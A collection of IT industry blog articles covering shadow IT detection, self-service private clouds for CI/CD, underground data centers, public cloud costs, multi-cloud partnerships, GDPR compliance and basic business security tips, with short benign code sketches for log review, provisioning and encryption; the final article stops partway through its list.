Facing Up To The IT Shadow

Certain psychological schools of thought posit the existence of “the shadow,” an unsettling figure that lurks in the darkness of the psyche and influences everything we do.

The decentralized, virtualized environment which now characterizes business IT architecture has also given rise to a shadow. And just like its psychological counterpart, so-called shadow IT operates out of sight of business management and can sometimes appear dangerously out of control. It can be painful to look at, but if IT professionals fail to deal with shadow IT, it has the potential to do severe damage in the form of data loss and non-compliance fines.

Facing Up to the Shadow

Shadow IT can be thought of as the sum of all the network assets not directly authorized and controlled within your current business IT policies. It includes, but is not limited to, devices such as unauthorized smartphones and tablets; cloud services like Dropbox and Google Docs; and third-party applications. As a responsible IT professional, ignoring shadow IT is not a viable long-term strategy.

First, ignoring shadow IT allows it to continue and grow in secret, increasing its ability to undermine security and utilize network resources.

Second, the difference between your authorized IT and shadow IT may not be appreciated by those higher up in the corporate food chain. To the leadership team, if something breaks and it is due to IT, the buck stops with the IT department. Ignorance may turn out to be no defense should your company lose data or suffer financial harm from untamed shadow IT.

Third, by actively getting a grip on shadow IT, turning it into numbers, and bringing the issue to the board, you are more likely to earn the respect of the leadership team and may even procure additional resources to help you do your job.

Finally, anything that harms the business as a whole will harm you as a department and as individual employees. There is no valid case to be made for ignoring shadow IT.

How to Detect Shadow IT

Once you have decided to face the nightmare of shadow IT, the first step is to incorporate it into your existing network monitoring system.

You will undoubtedly already have network management software set up that can monitor the assets used by users who are logged in to their company accounts. By analyzing each user’s assets, you can determine whether non-authorized devices or services are being accessed.

Nevertheless, you should still set alerts for the appearance of new and unknown devices on the network and carefully compare scans to pinpoint when and how they are connecting. Regularly reviewing firewall and proxy logs for evidence of shadow IT is also advisable.
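
To make the log-review step concrete, here is a minimal sketch of what such a check might look like. It assumes a CSV proxy log with "user" and "url" columns and a hand-maintained watchlist of cloud-service domains; both are illustrative placeholders rather than any particular vendor's export format.

```python
# Minimal sketch: flag proxy-log entries that point at cloud services on a
# shadow-IT watchlist. Log format and watchlist are assumptions; adapt both
# to whatever your firewall or proxy actually produces.
import csv
from collections import Counter
from urllib.parse import urlparse

WATCHLIST = {"dropbox.com", "wetransfer.com", "drive.google.com"}  # suspected shadow IT

def flagged_domain(url):
    """Return the watchlist domain a URL belongs to, or None."""
    host = (urlparse(url).hostname or "").lower()
    for dom in WATCHLIST:
        if host == dom or host.endswith("." + dom):
            return dom
    return None

def scan(log_path):
    """Count requests per (user, shadow-IT domain) pair in a CSV proxy log."""
    hits = Counter()
    with open(log_path, newline="") as fh:
        for row in csv.DictReader(fh):
            dom = flagged_domain(row["url"])
            if dom:
                hits[(row["user"], dom)] += 1
    return hits

if __name__ == "__main__":
    for (user, dom), count in scan("proxy_log.csv").most_common(10):
        print(f"{user:<20} {dom:<20} {count} requests")
```

Even a crude report like this, run weekly, turns anecdotes about "people using Dropbox" into numbers that can be taken to the board.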

As with all IT monitoring and troubleshooting processes, the frequency and granularity of scans will need to be weighed against the resource cost, but if extensive shadow IT is suspected, creating a dedicated shadow IT project is well worth considering, particularly given the potential privacy, security, and compliance issues involved.

Using Specific Shadow IT Detection Software

There are now countless apps, virtual services, and cloud providers on the market, and it can be almost impossible to identify and trace their signatures in a firewall log.

As part of your shadow IT clean-up drive, it is worth considering the shadow IT-specific software that is increasingly available to IT professionals.

Some software can monitor the network for thousands of different applications and cloud services not yet categorized by firewalls and proxies, simplifying and speeding up the shadow IT detection process. Access count, traffic patterns, and usage trends can add more information to build up a fuller picture of the extent of shadow IT exposure.

Some services can assist hard-pressed IT professionals even further by analyzing and categorizing cloud services in terms of risk, helping them prioritize the services and platforms that pose the greatest security risk. As you would expect, the data can be customized to suit individual company risk profiles, and reports can be filtered and exported in various formats (CSV, Excel, PDF, etc.) to present the findings in a meaningful way.
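
As a rough illustration of the reporting side, the sketch below filters a list of detected services by risk level and exports the result to CSV. The field names and sample entries are invented for the example and do not reflect any specific product's schema.

```python
# Sketch only: given detections already categorized by risk, keep the
# high-risk services and write them out as a CSV report.
import csv

detections = [
    {"service": "WeTransfer", "category": "file sharing", "risk": "high",   "users": 14},
    {"service": "Trello",     "category": "project mgmt", "risk": "medium", "users": 9},
    {"service": "Dropbox",    "category": "file sharing", "risk": "high",   "users": 31},
]

# Sort the riskiest services by how many users touch them.
high_risk = sorted((d for d in detections if d["risk"] == "high"),
                   key=lambda d: d["users"], reverse=True)

with open("shadow_it_high_risk.csv", "w", newline="") as fh:
    writer = csv.DictWriter(fh, fieldnames=["service", "category", "risk", "users"])
    writer.writeheader()
    writer.writerows(high_risk)
```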

Some services include policy enforcement capability, restricting access rights and, when integrated with firewalls and proxies, helping to identify new and insecure configurations.

Embracing the Shadow

Recognizing and facing up to the shadow — and shadow IT — is the easiest part. The road to healing comes from embracing it, no matter how much it worries and disturbs you.

This is not something that the IT department can or should be wholly responsible for. Shadow IT is a signal that the business is either not providing a critical service or tool or that the tools it does provide are not fast or smart enough. After all, if the head of finance is using a personal smartphone to access company accounts out of hours, is it because they don’t have the option of a company-owned device? If the business is asking the marketing team to deliver multi-gigabyte files to third parties with nothing but an email account to work with, is it any wonder they are using Dropbox or WeTransfer?

Rather than blaming employees for using shadow IT and banning it (which is unlikely to work anyway), a more productive stance is to ask them what they need to do their job and to look for in-house solutions. Some companies declare a shadow IT amnesty, inviting employees to disclose any non-authorized IT they are using with a view to finding sanctioned alternatives rather than punishing them.

The business can then follow this “no questions asked” policy with a deep security audit whereby existing policies are refined and redrafted and automated policy controls are installed, with any future changes requiring approval from the leadership team. Policy actions might include blocking access to the highest-risk services altogether and restricting access to others (e.g., setting permissions to “read-only” either across the board or depending on user role).

Shadow IT is a fact of the modern workplace, arising from the increasing availability of enterprise-grade technology in the public sphere. Although facing and sizing up the shadow is a necessary first step, only by truly embracing its existence can a business draw the necessary lessons and use these to neutralize the very real danger it poses.

Keys To Agile Software Development

Organizations want to move to a continuous integration/continuous deployment (CI/CD) model in software development and the cloud can help, but there are key obstacles standing in the way. For example, in many software companies, the IT operations (IT Ops) team has a lengthy procurement and provisioning cycle, and developers may have to wait anywhere from several days to a few weeks for IT Ops to handle each request for new tools or workspaces.

In addition, there is a lack of automation in IT Ops procurement and provisioning cycles. For example, developers may be using an outdated IT ticketing system to request infrastructure and software — each time a developer issues a ticket request, an IT Ops person must follow a certain workflow to fulfill that request, and must complete each step before sending the ticket on to the next IT Ops person in the chain.

Silos are another obstacle. In large enterprises, IT Ops teams have silos — individuals or sub-teams with different responsibilities at different levels. Each individual or sub-team fulfills certain tasks for a Dev/Test request separately from the others. These silos turn IT Ops procurement into a series of handoffs, where each team member must complete their assigned tasks before handing the job off to another team member. This results in delays, where DevOps people must wait for requests to move through the IT Ops pipeline as each person in each silo performs their separate tasks. The silos create a lack of collaboration between separate IT Ops teams, and between IT Ops and DevOps, when ideally they should all be working together to accelerate the procurement process.

A self-service private cloud will remove these obstacles, helping to clear the IT Ops pipeline while providing developers, testers, and QA people with the IT infrastructure and tools they need for ongoing CI/CD development. According to Gene Kim, “When self-service provisioning can be done quickly and consistently through complete virtualization, you eliminate the obstacles to give developers, testers, and QA the environments they need for continuous integration and continuous deployment.”

The following are some attributes of a self-service automated cloud.

On-Demand Self-Service Provisioning

A self-service private cloud should offer a set of automated provisioning tools so developers and testers can create their own Dev/Test environments. It should include both a self-service user interface and an API-driven, infrastructure-as-code capability that lets developers create VMs and databases, access storage, set up network connections, and so on using RESTful API calls.
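
As a hypothetical illustration of that API-driven approach, the sketch below provisions a VM through a RESTful self-service endpoint. The URL, payload fields, and token handling are assumptions made for the example; a real private cloud would expose its own API.

```python
# Hypothetical "infrastructure as code" call against a self-service
# provisioning API. Endpoint, fields, and auth are placeholders.
import requests

API = "https://selfservice.example.internal/api/v1"
HEADERS = {"Authorization": "Bearer <token>", "Content-Type": "application/json"}

vm_spec = {
    "name": "appdev-ci-runner-01",
    "cpu": 4,
    "memory_gb": 8,
    "disk_gb": 80,
    "network": "dev-vlan-10",
    "image": "ubuntu-22.04",
}

# Request a new VM and fail loudly if the platform rejects the spec.
resp = requests.post(f"{API}/vms", json=vm_spec, headers=HEADERS, timeout=30)
resp.raise_for_status()
print("Provisioned VM:", resp.json().get("id"))
```

Because the request is just data, the same spec can live in version control and be replayed to rebuild an environment on demand.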

In essence, a self-service private cloud automates the provisioning process by letting developers and testers manage their own initial deployments and configurations. This removes many of the confusing and error-prone manual steps that IT Ops people must go through to deliver the infrastructure and software stacks that developers need. It also removes the silos within the IT Ops organization, as it puts provisioning of individual elements (VMs, databases, storage, etc.) in the hands of developers.

An Intelligent and Well-Organized User Interface

A self-service private cloud should have an intelligent user interface (UI) that gives developers access to a set of common infrastructure tools (e.g., VMs, Oracle or SQL Server databases, storage, network connections) and applications. This eliminates the old ticketing-based processes where users must submit multiple tickets to IT Ops to build their physical and software stacks, allowing developers to set up their own DevOps environments on the private cloud with just a few clicks.

Ideally, a self-service UI should allow IT Ops administrators to assign resources in an organized manner. They should be able to designate business units (BUs) on the UI (e.g., “AppDevTeam1,” “WebDevTeam1”) based on units within the company; assign team members to BUs; and designate current projects (e.g., “AppDevProject1”) on the UI according to BU. They should also be able to assign quotas to each BU (e.g., AppDevTeam1 gets 100 VMs, 25 vCPU cores, 100 GB memory, and 400 GB storage), and to each individual project (e.g., AppDevProject1 gets 10 VMs, 5 vCPU cores, 8 GB memory, and 40 GB storage).
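
The sketch below illustrates that quota model using the article's own example numbers: a provisioning request is accepted only if it stays within both the project quota and the parent BU quota. It is a conceptual sketch, not any vendor's API.

```python
# Conceptual quota check: business units and projects carry resource quotas,
# and a request must fit inside both. Numbers are the examples from the text.
BU_QUOTAS = {"AppDevTeam1": {"vms": 100, "vcpu": 25, "memory_gb": 100, "storage_gb": 400}}
PROJECT_QUOTAS = {"AppDevProject1": {"vms": 10, "vcpu": 5, "memory_gb": 8, "storage_gb": 40}}

def within_quota(usage, request, quota):
    """True if current usage plus the new request stays inside the quota."""
    return all(usage.get(k, 0) + request.get(k, 0) <= quota[k] for k in quota)

usage = {"vms": 8, "vcpu": 4, "memory_gb": 6, "storage_gb": 32}      # what the project already uses
request = {"vms": 1, "vcpu": 1, "memory_gb": 2, "storage_gb": 8}     # what the developer is asking for

allowed = (within_quota(usage, request, PROJECT_QUOTAS["AppDevProject1"])
           and within_quota(usage, request, BU_QUOTAS["AppDevTeam1"]))
print("request allowed:", allowed)
```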

Application Store

A self-service private cloud should have an online “application store” that provides single-click access to common development tools and services, such as:

  • CI/CD tools such as Jenkins, Git, Maven, and Junit
  • Workload management tools such as Ansible, Puppet, and Chef
  • Middleware services such as RabbitMQ and Redis
  • Storage back-ends such as MySQL, Postgres, Cassandra, and MongoDB

The private cloud should also allow IT Ops to place commonly used applications on the self-service UI to give developers and testers even easier access to them. For example, IT Ops can make a duplicate of the production environment available on the UI for testers. They can then update the cloned production environment every few months to make sure testers are using the most current and accurate duplicate.

Seamless, Two-Way Cloud Migration

A self-service hybrid cloud should have seamless two-way migration to allow developers and testers who have public cloud access to easily move applications and workloads back and forth between public and private clouds.

Administrative Dashboards

A self-service private cloud solution should have a set of administrative dashboards that allow the IT Ops team to control access to resources on the UI. These dashboards should give admins complete visibility into which teams and team members are utilizing which resources, and allow the IT Ops team to perform admin tasks such as:

  • Creating user accounts and passwords on the UI
  • Creating BUs, and projects for each BU, on the UI
  • Assigning developers and testers as “members” of a certain BU or project
  • Assigning self-service infrastructure tools (compute, storage, network) on the UI, and setting quotas for those tools according to BU or project
  • Importing new applications to the application store or the UI

A Software as a Service (SaaS) Platform

A SaaS platform with portal-based access is the best venue for a self-service private cloud solution. A SaaS platform provides the flexibility to do upgrades and customization to the various features of the UI, application store, and administrative dashboards. The flexibility of the SaaS private cloud solution gives it the potential to become the de facto standardized platform for CI/CD and deployment in agile software development.

Conclusion

Both Dev/Test and IT Ops teams are under pressure to support the demands of agile development, but they have different goals. Developers and testers want to achieve faster time to market in delivering applications to their customers. Meanwhile, IT Ops teams want to achieve a faster time to value in delivering IT resources and applications to Dev/Test teams to support their goal of faster time to market.

As we’ve seen, the obstacles that hinder these goals — lengthy procurement and provisioning cycles, lack of automation, internal silos that create bottlenecks — are formidable, but can be overcome with the right technologies. A self-service, automated private cloud empowers developers and testers, giving them the tools they need to create their own DevOps environments. It also frees IT Ops teams from manual provisioning tasks, allowing them to provide developers and testers with IT resources in a more direct and timely manner. In short, a self-service private cloud helps both developers and IT Ops teams achieve their separate goals of faster time to market and time to value by clearing IT Ops obstacles to support the ongoing CI/CD cycle.

The Cloud Goes Underground

Extreme weather, seismic events, and even rodents have compromised the physical security of cloud servers and other data center infrastructure. Selecting an underground colocation facility built to above-industry standards provides a solution to these and other threats.

With cyberattacks such as Petya and WannaCry making big headlines recently, it’s understandable that fortifying cybersecurity is top-of-mind for many CIOs. Last May, WannaCry invaded 200,000 computers in 150 countries, including the U.S., UK, Russia, and China, as it attacked hospitals, banks, and telecommunications companies.

A mere six weeks later, Petya struck — first hitting targets in Ukraine, including its central bank, main airport, and even the Chernobyl nuclear power plant, before quickly spreading and infecting organizations across Europe, North America, and Australia. Its victims included a UK-based global advertising agency, a Danish container ship company, and an American pharmaceutical giant.

Virtual Security Is Only Half the Equation

According to the 2017 BDO Technology Outlook Survey, 74% of technology chief financial officers say cloud computing will have the most measurable impact on their business this year, while IDC predicts that at least 50% of IT spending will be cloud-based in 2018. Although cyberattacks remain a significant threat in this environment, it’s important to remember that virtual security is only half of the equation. With the cloud growing ever more critical to businesses, ensuring the physical security of cloud servers is also essential.

Physical security at the colocation or data center facility is critical to effectively safeguarding not only cloud computing but also mission-critical business applications, data storage, networking, and the computing behind Big Data analytics and emerging technologies such as artificial intelligence and IoT-enabled devices. To be fully secure, companies must ensure that their colocation provider can deliver a high level of physical resilience on-site. As evidenced by the devastation wreaked by Hurricanes Harvey and Irma, these physical threats include extreme weather events, but also seismic disturbances, breaches by unauthorized intruders, and, given the current geopolitical climate, terrorism.

Explosives and Squirrels

In recent years, many customers have deprioritized physical security on their data center to-do lists. However, physical threats remain real and have the potential to become much more sophisticated. As the late Uptime Institute founder Kenneth Brill wrote, “The oldest cyber frontier is actual physical attack or the threat of attack to disable data centers. Previously in the realm of science fiction, asymmetrical physical attacks on data centers by explosives, biological agents, electromagnetic pulse, electric utility, or other means are now credible.”

While electromagnetic pulses do sound like the stuff of science fiction, some physical security breaches perpetrated against data centers have been more suggestive of a Quentin Tarantino crime drama, and others, a Pixar animated movie starring woodland creatures. None of this is to minimize the economic impact of these attacks or the damage they have caused to business reputations.

Consider the Chicago-based data center that experienced a physical security breach not once but twice in the span of two years. In the first breach, a lone IT staffer working the graveyard shift was held hostage and his biometric card reader taken from him, allowing the masked assailants to enter the facility freely. They made off with computer equipment estimated to be worth upwards of $100,000. In the second, resourceful miscreants managed to break through a wall with a chainsaw and stole servers.

Yahoo once saw half its Santa Clara data center taken down by squirrels that managed to chew their way through powerlines and fiber-optic cables. Google “Yahoo and frying squirrels” if you think this episode is referenced merely for entertainment purposes. It is not.

Among the most infamous physical breaches to have taken place was a 2011 attack on Vodafone’s data center in Basingstoke, England. A gang broke in and stole servers and networking equipment, causing systems to go down and the telecom company’s business reputation to suffer greatly.

The Rock-Solid Safety of Colocating Underground

For some companies, the cloud and IT infrastructure altogether have moved even farther from the skies to underground data centers. Data center operators have been retrofitting underground bunkers into functional data centers for many years. But as security and energy demands as well as concerns about terrorism have lately intensified, there’s an increasing trend towards building subterranean colocation facilities to host mission-critical infrastructure and data.

Today, you’ll find underground data center facilities in Lithuania, the Netherlands, Switzerland, Ukraine, the United Kingdom, and Sweden, as well as the U.S. Some of these facilities were previously the site of mining operations while others were originally Cold War era bunkers designed to protect citizens in the event of a nuclear attack.

Surrounded by rock, underground data centers are highly physically secure, and since subterranean temperatures are naturally regulated, environmental control is more efficient. But not all underground data centers are created equal. Key design factors to consider during the site selection process include utilities infrastructure, the availability and capacity of fiber-optic systems, exposure to natural and man-made hazards, and how well the physical perimeter of the facility can be secured.

The issue of location is especially critical, and any data center selection needs to consider whether the facility is in a flood zone or if the region has an unstable seismic profile. The most fortified underground data centers also implement multi-layered security access methods, including visual inspections from multiple 24×7 guard stations, keycard access, video monitoring, and biometric scanning. Best practices incorporate mantraps and restrictive access policies for each customer’s space, providing security within each zone of the facility.

To ensure business continuity, it’s advantageous that all critical infrastructure of a subterranean data center be located underground. This extends to dual utility feeds backed up by two MW generators and N+1 critical infrastructure components, including UPS, chillers, and battery back-up. Such a design is further enhanced by SOC 2 Type 2 certification, which gives customers confidence in the provider’s 100% uptime guarantee, where one is offered.

And because connectivity means everything, subterranean facilities should also have access to high-speed, carrier-class internet and data services through a fiber network that runs in and out of the data center via multiple fiber paths and entrances.

From presidential bunkers and NORAD facilities hosting military analysts, to scientists studying astrophysics in subterranean laboratories, and to Warner Brothers film archives stored safely away from the elements, some of the world’s most essential personnel, valued assets and activities are located underground, protected from natural and most man-made disasters. So, why should your cloud servers and critical data be any different?

But the crux of the matter is this: while cyberattacks are on the increase and the cloud can be vulnerable, the importance of physical data center security cannot be overstated. The underground data center is a prime example of using the earth itself to offer protection from natural and unnatural disasters.

What You Don’t Know About Public Cloud Might Hurt You

Companies seem to be moving to public cloud in droves, as conventional wisdom would have us believe it’s more user-friendly, scalable, and affordable than private cloud. So is it ‘bye-bye’ to on-premises storage? Is that the way to go? Not necessarily.

While public cloud adoption has grown steadily over the last several years, there is also a newer trend of organizations waking up to the hidden costs involved, both in fees beyond the quoted price per GB and in the potential cost to a business’s data security. Companies are finding that data transit fees for public cloud storage can double the cost of basic storage, and can be as high as three or four times if data is moved often. Yet these fees are frequently ignored when organizations are considering the use of public cloud, leading to gross miscalculations and overspending. Then there is the question of data security and availability. Breaches of public cloud have become commonplace, and yet organizations are led to believe the public cloud is safe for the most sensitive data. How can this be?
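
A quick back-of-the-envelope calculation shows how transit fees can erode the headline price. The rates and movement pattern below are illustrative placeholders, not any provider's published pricing.

```python
# Illustrative only: egress fees can rival the quoted storage price once
# data moves regularly. All figures are assumed, not real price lists.
stored_gb = 10_000
storage_price_per_gb = 0.02      # $/GB-month (assumed)
egress_price_per_gb = 0.09       # $/GB transferred out (assumed)
egress_fraction = 0.3            # share of the data set moved out each month (assumed)

storage_cost = stored_gb * storage_price_per_gb
egress_cost = stored_gb * egress_fraction * egress_price_per_gb

print(f"storage:  ${storage_cost:,.0f}/month")
print(f"egress:   ${egress_cost:,.0f}/month")
print(f"total is {1 + egress_cost / storage_cost:.1f}x the quoted storage price")
```

Push the movement fraction up toward whole-dataset migrations or frequent restores and the multiplier climbs quickly, which is exactly the three-to-four-times scenario described above.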

The answer is twofold. First, the major public cloud providers have huge marketing budgets, and with that comes the ability to dominate the airwaves with their message and get in front of a large set of customers. Second, public cloud can be the right solution under certain circumstances, primarily for short-term storage. But with recent headline-grabbing public cloud outages from the likes of AWS S3 and Azure, and the related data leak risks coming to light, the fundamental importance of keeping greater control over the most critical data has come back into focus.

A related problem is that CIOs and IT leaders are failing to read the fine print in their public cloud contracts. In many of these contracts, the vendor has very little obligation to the customer. In reality, durability and availability should be managed just as they would be for an on-premises storage infrastructure, with the CIO superimposing an architecture on top of the cloud to establish the desired level of certainty.

This all leads to organizations investing heavily in public cloud solutions that not only lack control over security and data locality but also, in the long run, cost more.

So why does everyone think public cloud is cheaper?

Perception and reality of the public cloud do not always align. Although the public cloud may appear more affordable, and is certainly marketed that way, the reality is that once organizations are tied into recurring monthly fees, the outlay becomes expensive, not to mention that transit and other fees can be vastly more than you ever imagined. Some cloud service providers also charge per user, so although public cloud promotes unlimited scalability, this can come with a heavy price tag.

Many companies also use public cloud as a way to increase data resilience, since data stored in the public cloud can use a form of data protection called erasure coding. However, erasure coding only protects against certain hardware failures. It does not protect against input errors, human maliciousness, ransomware, malware of all kinds, or software corruption. Erasure coding can also add significant latency, affecting application performance and response time. It is also common for public cloud vendors such as Amazon to charge for replication, or the copying of data across multiple data centers, adding further to the cost. As a result, IT teams often end up selecting a less sophisticated public cloud vendor in an effort to save costs, but this introduces more risk, as these smaller vendors also have less sophisticated protection.
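
To see why erasure coding helps with hardware loss but not with corruption or ransomware, consider this toy single-parity sketch. Real erasure coding uses Reed-Solomon-style encoding across many shards, but the limitation is the same: the scheme faithfully protects whatever is written, including bad data.

```python
# Toy single-parity analogy: a lost block is recoverable, but a block that is
# silently overwritten (corruption, ransomware) just becomes the new "truth".
def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

block1 = b"customer"
block2 = b"records!"
parity = xor_bytes(block1, block2)           # stored alongside the data blocks

# Hardware failure: block1 is lost, but parity XOR block2 rebuilds it.
assert xor_bytes(parity, block2) == block1

# Ransomware: block1 is encrypted in place and parity is recomputed on write,
# so "recovery" dutifully returns the corrupted data. Only a separate backup
# restores the original.
block1 = b"\x13\x37" * 4
parity = xor_bytes(block1, block2)
assert xor_bytes(parity, block2) == block1
```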

In contrast, on-premises private cloud can provide the same agility as the public cloud, but within the organization’s own environment, offering more functionality such as higher performance, local control and protection against malware.

Data is the lifeblood of an organization and critical to its success, which is why more businesses are retaining information for longer and using it to gain insight into customer behavior and trends. Storage is therefore critical, and companies need a comprehensive IT infrastructure that offers the same agility as the public cloud, such as seamless file sharing, but with the added security and control that on-premises infrastructure provides, to safeguard a company’s most sensitive data over the long term.

Availability and security

Relying on third-party public cloud providers also brings availability and security into question. As the aforementioned outages demonstrate, public cloud services are not immune to downtime. This is something smaller organizations especially cannot afford. Although AWS, for example, recovered from its outage several months ago with only a small impact on its revenue, it is not always the same story for SMBs, which may not be able to recover at all. Downtime in any form can have critical consequences for smaller organizations.

So is public cloud too risky? To be clear, public cloud isn’t going anywhere and it provides crucial benefits to many businesses. However, before opting to trust a public cloud service provider with all of your data, it’s important to understand which data is most critical to business survival. For that data, too much is at stake to place it in the hands of an outside party, and the additional cost makes doing so even harder to justify. The only way to maintain full control while also minimizing expenses is through an on-premises solution as part of your infrastructure. This way, organizations can achieve the agility of the cloud at a lower cost and with guaranteed control over data privacy, availability, and security when it matters most.

It’s time we updated the conventional wisdom on the role, limitations, and true cost of the public cloud.

Multi-Cloud In The Context Of Market Verticals

As is well known, the cloud market is dominated by large cloud service providers (CSPs) such as Amazon, Google, and Microsoft, with Amazon Web Services alone holding 47.1% of the public cloud market. Smaller CSPs increasingly have to diversify their offerings and collaborate, rather than compete, with large and other small providers, for example to deliver specialized services for a particular market vertical.

The concept of cloud computing is being defined and redefined by the larger players, and the smaller players are continually playing catch-up. The agility and functionality of the smaller players, however, is increasing to support a more agile approach to integrating and working with public cloud providers. The large CSPs are interested in providing cost-effective, profitable computing services, and the more niche, specialist requirements are largely ignored. This has handed a partnership advantage to the smaller CSPs, facilitated by tools such as AWS Direct Connect and Azure ExpressRoute, which allow on-premises or data center providers to scale into the public cloud on demand.

The concept of multi-cloud in the context of smaller providers is now being spread in multiple dimensions:

  • Hybrid cloud: Providing customers the ability to hyper-scale from their private cloud environment into public cloud providers.
  • Network connectivity: Providing interconnects to proprietary networks, such as the Health and Social Care Network (HSCN), which large public cloud providers cannot provide directly.
  • Backup and disaster recovery: Using geographically diverse data center operators and different CSPs to deliver enterprise solutions.

Smaller CSPs need to provide a comparable specialized service and toolset to match the agility of the larger players.

Collaborate, not compete

The domain-specific knowledge that smaller CSPs now hold means larger CSPs are being driven to collaborate with them to close the gaps in their own domain expertise.

In the health care domain, for example, CSPs have gained domain-specific knowledge because they are close to the end users. Often CSP domain experts are engaging not with technical people but with clinicians who are at the cutting edge of adopting new and innovative cloud-based technologies as part of their service to patients. It is not just a case of CSPs selling equipment as a service; they need to create a service that meets the needs of the end user, and this cannot be done one step removed from the user’s domain experts. An overall service offering that matches all of a client’s requirements in terms of availability, performance, security, privacy, and so on will drive an increasing demand for alliances with other CSPs, and providers will need to be prepared to enable and facilitate such scenarios.

Reputation

Larger cloud service providers, particularly those delivering to the public sector, must consider the reputational risk associated with their business relations with smaller CSPs. Recently, Data Centred, a Manchester, UK-based data center provider, was put into administration after its only customer, the UK government’s HM Revenue and Customs (HMRC), opted to move its entire environment into the AWS public cloud. It can be argued that building a business on one, admittedly large, customer is high risk and that Data Centred should have diversified and built a wider customer base. However, even with a more diverse customer portfolio, the loss of such a disproportionately large customer would have forced a major restructuring and downsizing, and bankruptcy might still not have been avoided. This has fed public concern about predominantly American providers delivering data center services to EU-based businesses and governments. To counter this perceived problem, many public cloud providers are opting to work with local CSPs to front services that are supported by the public cloud.

Security and Privacy

At the CloudWATCH Summit in September 2017, Nicola Franchetto, senior associate and data protection officer at ICT Legal Consulting, explained that the upcoming EU General Data Protection Regulation (GDPR) will broaden territorial reach compared to the current regime. The new regulation will apply not only to data controllers and processors in the EU, but also to processors outside the EU that offer goods or services to data subjects in the EU and/or monitor the behavior of data subjects in the EU.

In this context, small providers that master local regulations and data protection in the cloud will play a valuable role as allies of the big players, both inside and outside the EU, that need to demonstrate adherence to the EU GDPR. Furthermore, application and service providers in privacy-demanding vertical domains will be inclined to opt for cloud offerings that ease their compliance and supply the necessary security and privacy controls, such as those provided by the MUSA framework.

In conclusion, the picture of cloud service provision is not as simple as the marketing of the larger CSPs would have us believe. Domain expertise and local expertise are frequently cited as reasons for a collaborative approach to providing services, leading to an increase in multi-cloud service provision. The future impact of GDPR cannot be ignored by large CSPs and will further increase the need for partnership alliances. Large CSPs are finding that it is often easier to collaborate with smaller local CSPs than to ignore them. After all, cloud computing is a collaboration between customer and supplier, and expanding that relationship is natural.

How The Cloud Can Help Your Business Get Compliant With GDPR

UK Brexit planning has started in earnest, and companies and organizations are rightly looking at what leaving the European Union (EU) will mean for their operations and staff.

However, amid wide-ranging business concerns sits a new piece of legislation affecting personal data that could have similar aftershocks: the General Data Protection Regulation (GDPR), which will apply to the UK from May 25, 2018.

GDPR is intended to strengthen data protection for individuals within the EU while imposing restrictions on the transfer of personal data outside the European Union to third countries or international organizations.

It would be a mistake for any data controller or processor to assume that because they know and adhere to the existing Data Protection Act 1998 (DPA), GDPR will be similar and no additional compliance work is required.

GDPR brings a set of new and different requirements, and for anyone with day-to-day responsibility for data protection in their organization, it is imperative to monitor the regulation and ensure the organization is compliance-ready ahead of next year.

Compliance requires investment as well as specialist knowledge, and many business leaders are looking at how the cloud can help with their data storage, protection, and management while also meeting GDPR requirements.

GDPR is the biggest challenge facing data management in the last 20 years; it is no exaggeration to say that it is giving business leaders a headache.

A survey from analyst firm Gartner earlier this year showed that around half of those affected by the legislation, whether in the EU or outside, will not be in full compliance when the regulations take effect.

The message coming through is that the cloud is the preferred option for upgrading data security practices and data protection standards in line with the regulation.

As the May 2018 deadline draws ever closer, moving data to the cloud can help ease the burden faced by senior IT leaders, many of whom see GDPR compliance as their top priority.

As a leading cloud services provider, we are increasingly being asked about GDPR considerations from concerned clients migrating to the cloud.

We believe that migrating people’s data, such as emails, contacts, files, calendars, and tasks, over to Office 365 will make compliance easier for organizations.

During any cloud migration process, the most important outcome, particularly with GDPR compliance ahead, is that data sovereignty is maintained and that full control with comprehensive reporting is provided.

After migration comes management, and this is the next big part of the cloud journey that is vital to GDPR compliance, addressing security and data protection.

Organizations and service providers require a tool that can control multi-tenant Office 365 users in an intuitive and cost-effective way.

Bulk transaction processing, advanced hierarchical management capabilities, and role-based access control will all help companies comply with the increasingly stringent access controls required by GDPR.

GDPR compliance before May 25, 2018 isn’t optional for those doing business with EU countries; it’s a necessity. Organizations will need to look across their business and manage their data holistically to ensure compliance and avoid sanctions. With GDPR coming into effect in a matter of months, the time to act is now.

5 Ways To Protect Your Business From Being Hacked

The past couple of months have been a huge wake-up call for businesses in terms of their cybersecurity. With large enterprises such as Equifax being successfully attacked, costing the company billions as well as its reputation as a trusted service, there are no longer any doubts about the importance of protecting company-sensitive information.

Protecting your business from cyber criminals is easier said than done. For every new security measure you integrate into your business, cyber criminals mastermind a new method to circumvent your security and access critical data.

This doesn’t mean you can’t protect your data from hackers. Here are some techniques which you can implement that will greatly diminish the chance of being successfully hacked.

Encrypt Business Critical Data to Mitigate the Risk of Being Hacked

Think about all the customers whose personal credentials your company has gathered in the last year alone. Imagine having to explain that your data has been breached and is in the hands of an unidentified cybercriminal. This is not a conversation that any CEO should have to initiate.

It is important to encrypt all sensitive data. Good data protection practices also include making use of trusted, credible financial service providers such as PayPal or Google Wallet.
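
As a minimal sketch of encryption at rest, the example below uses the open-source Python cryptography package (Fernet, an authenticated symmetric scheme). The record shown is invented, and in practice the key must live in a proper secrets manager, never alongside the data it protects.

```python
# Minimal encryption-at-rest sketch (pip install cryptography).
from cryptography.fernet import Fernet

key = Fernet.generate_key()          # store in a secrets manager, not next to the data
fernet = Fernet(key)

record = b'{"name": "Jane Doe", "card_last4": "4242"}'   # invented example record
token = fernet.encrypt(record)       # ciphertext safe to write to a database or backup
assert fernet.decrypt(token) == record
```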

Ensure That Your Security Software is Up To Date

Your employees are immensely valuable to the daily operations of your business. At the same time, because of their daily interaction with company-sensitive information, they are also your Achilles’ heel.

In order to reduce the risk of malware and spyware infections, it is important to keep your antivirus software up to date. Employees are known to browse dubious websites for entertainment now and then during the workday; it is inevitable in most workplaces.

However, if you wish to mitigate the risk to your company, it is important to limit the sites that can be accessed through work terminals to diminish the window of opportunity for an attack against your company.

Physical Security Has Never Been More Important

The mistake that many businesses make is focusing solely on online security and neglecting to secure their physical assets. This doesn’t mean you have to hire people to guard your computers, but you should treat the physical security of your team and your workplace as just as important as your cybersecurity.

Doing this reduces the chance of a physical breach of data, such as stolen hardware. It may not stop the typical thief, but it will make them reconsider whether the job is worth the time and effort it will take.

Protect Yourself from Common Cybercriminal Techniques

Cybercriminals work diligently to find vulnerabilities in a company’s security. The smallest flaw in your security is a door left wide open for any knowledgeable cybercriminal. The good news is that there are fairly easy fixes for most common vulnerabilities in your security system.

